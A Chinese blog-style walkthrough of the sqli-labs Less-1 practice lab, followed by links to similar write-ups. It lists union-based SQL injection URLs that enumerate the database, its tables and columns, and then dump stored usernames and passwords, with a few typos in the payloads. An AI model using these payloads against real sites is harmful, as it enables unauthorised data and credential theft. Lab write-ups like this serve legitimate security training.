sqli-labs之less1

最新推荐文章于 2024-04-17 21:32:10 发布
最新推荐文章于 2024-04-17 21:32:10 发布
阅读量344 收藏 1
点赞数
分类专栏: sql sqli-lbas 文章标签: sql-labs

在看别人的博客的基础上自己加了些修改

sql-labs之less1

打开题目我们可以看到这样的界面
在这里插入图片描述
一、我们先尝试下看是不是get获取请求方式。
在地址栏后面加上?id=1;发现结果是我们所预料的get方式。
http://127.0.0.1/sqli-labs-master/Less-1/?id=1

在这里插入图片描述
二、在http://127.0.0.1/sqli-labs-master/Less-1/?id=1加个’,查看下会出现什么效果
在这里插入图片描述
我们提交后,sql语句就被构造成了’1’'limit ‘0,1’。
三、那我们要怎样把‘去掉呢,这就想到了万能密钥’or 1=1–+ 我们尝试一下

http://127.0.0.1/sqli-labs-master/Less-1/?id=1‘or 1=1--+

在这里插入图片描述
果然可以,页面又正常了。
可,这是为什么呢,我们去查看下源码,
源码位置如下
在这里插入图片描述
在这里插入图片描述
当我们提交’or 1=1–+,由于sql语句未做任何过滤,所有,构造的sql语句就是

$sql="SELECT * FROM users WHERE id='1'or 1=1--+'LIMIT 0,1";。//'1'or 1=1--+'这个永远为真,所以我们就成功造成了注入

四、判断它所在的数据库有几列

http://127.0.0.1/sqli-labs-master/Less-1/?id=1‘order by3

在这里插入图片描述

http://127.0.0.1/sqli-labs-master/Less-1/?id=1’order by 4

在这里插入图片描述
故它所在的数据库有3列。
五、判断它的内容显示在第几列

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’union select 1,2,3--+

在这里插入图片描述
六、找出当前的用户权限

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’union select 1,user(),3--+

在这里插入图片描述
七、查找当前的数据库

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’union select 1,database(),3--+

在这里插入图片描述
八、查找当前数据库的表名

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1‘union select 1,(select group_concat(table_name) from information_schema.tables where table_schema =’security‘),3--+

在这里插入图片描述
九、查找当前表(users)下的列

  http://127.0.0.1/sqli-labs-master/Less-1/?id=-1‘union select 1,(select group_concat(column_name) from information_schema.column where table_schema =’security‘ and table_name='users'),3--+

在这里插入图片描述
十,查找用户名

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’union select 1,(select group_concat(username) from security.users),3--+

在这里插入图片描述
十一、查找密码

  http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’union select 1,(select group_concat(password) from security.users),3--+

在这里插入图片描述
十一、也可以直接找出对应的用户和密码

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1‘union select 1,username,password from users where id=2--+

在这里插入图片描述

giunwr
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-1
m0_63190830的博客
06-30 199
sqli/less-1基础题
sqli-labs第一关
qq_51366383的博客
12-06 442
一、sqli-labs第一关 1、判断是字符型还是数字型 Id=2-1 与 id=2 结果相同就是字符型 2、判断闭合符 通过输入’和" 可以判断这关的闭合符为’ 3、查询字段数量 字段数为3 4、确认占位信息 5、查看信息 数据库 表名 列名 数据 二、自己上课的笔记 一、有回显之联合注入 union select 加-1是前面是错的,才 页面回显位回显数据 条件:有回显,知道前表字段数 1、获取数据库名 select distinct table_schema from in
sqli-labs-master(Less1--Less5)
2301_81105268的博客
04-17 1115
MYSQL数据库的所有表的信息都存储在了information_schema数据库里面的tables这个表里(information_schema.tables中两列table_schema是数据库名,table_name中表名。from information_schema.tables即table_name的内容在这个数据库里的tables表里查询,并且有个条件是table_name这个表所属的数据库是security。由此可判断闭合为:')输入3显示正常,输入4报错,则判断数据库中的字段数为3。
Sqli-Labs之less-1
ISNS的博客
02-03 1771
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 1.进入less-1的题目以后,我们可以看到这道题的提示“请输入ID作为带数值的参数”: 2.我们根据题目提示,尝试在URL中加上“?id=1”、“?id=2”,可以看到看到从数据库中查询到的用于登录login的用户名和密码: 我们要找的是网站后台管理员的用户名和密码,目的是拿到网站的权限,从...
sqli-labs中less-1~4实验详解
mr_secretT的博客
05-26 638
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的数据。这里我们使用的id参数为0,是因为我们需要id参数不存在于数据库的序列号当中,也可以使用负数.通过上述回显,我们可以判定,回显位为第2\3列。4.根据结果我们可以判定这是一个字符型注入漏洞,我们可以得到页面回显。2.从页面回显可以看出,3列数据中,只有2列可以页面回显,我们需要确认一下到底是哪两列会回显呢?我们可以构造语句获取每个。
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2759
sqli-labs靶场之前建议补一下基础。
sqli-labs通关攻略教程一(less 01~less 02)
m0_55854679的博客
06-12 341
数据库知识整理 MYSQL基本用法 查库 show databases; ##方法1 select schema_name from information_schema.schemata; ##方法2 2. 查表 use security; ##方法1 show tables; select table_name from information_schema.tables where table_schema='security' ##方法2 3. 查列 se
sqlilabs通关详解less1-10
ndppl的博客
03-14 961
注意的是,可能存在文件读写权限问题,需在MySQL\my.ini中加入“secure_file_priv=”并重启MySQL。id=1' and length((select database()))
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
1. **字符型联合注入**(如less-1): - **注入点检测**:通过修改查询参数(如?id=1' and 1=1),观察页面响应变化来判断是否存在注入。 - **闭合方式判断**:通过输入特殊字符(如\)来测试闭合方式,确认是单...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入...
SQLi-LABS Page-1(Basic Challenges)
07-24
在这个挑战中,从Less-1到Less-5,每一关都涉及不同的注入点和策略。例如: 1. **Less-1** 是一个基础的SQL注入实例,它展示了如何利用单引号来触发错误并揭示SQL结构。通过观察错误信息,学习者可以识别注入点并...
Sqli-labs靶场详细攻略Less 1-5
qq_41755084的博客
10-09 1504
Sqli-labs靶场详细攻略
Sqli-lab:Less-1教程
m0_72286569的博客
01-28 556
1,当输入时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询2,判断SQL语句是否是拼接a,当我们输入1’时会报错b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入。
sqli-labs less 1(菜鸟,刚学手工注入写的笔记)
qq_60829702的博客
09-17 1279
这也是我刚开始学手工注入,笔记写的还不够全面,里面少了一些注释,知识点还不全面,但我认为写的太全面对于像我一样刚接触的菜鸟不太好,因为写的太详细就会让自己产生一种错觉,认为自己已经懂了,就直接跳过这些东西,这种习惯不太好。还是要自己去查资料,去看一些官方的解释文档。下面这个博主的视频讲的也很好非常适合入门,大家如果不懂可以看这个大佬的视频。
sqli-labs—————Less-1(字符型注入)
Fly_鹏程万里
05-08 1895
前言从这一篇文章开始,我们将开始真正的讲解Sqli-libs中的各种注入,从第1阶层开始,后续的内容会陆续放出,欢迎各位大佬的关注与评论!Less-1首先,打开主页进入第一关:可以看到提示,提示我们要传入一个参数,名为ID,而且是数据类型,那么我就传入该参数看看到这里,我们可以发现后台执行的SQL语句好像是根据该传入的参数id进行了相应的查询,那么我可以从搭建的环境中来看看它的数据库到底有什么东西...
SQLi-LABS less-1
qq_37529822的博客
05-30 151
SQLi-LABS less-1通关总结(纯小白向) 先来看看题目 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaTeX数学公式 语法; 增加了支持甘特图的mermaid语法1 功
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值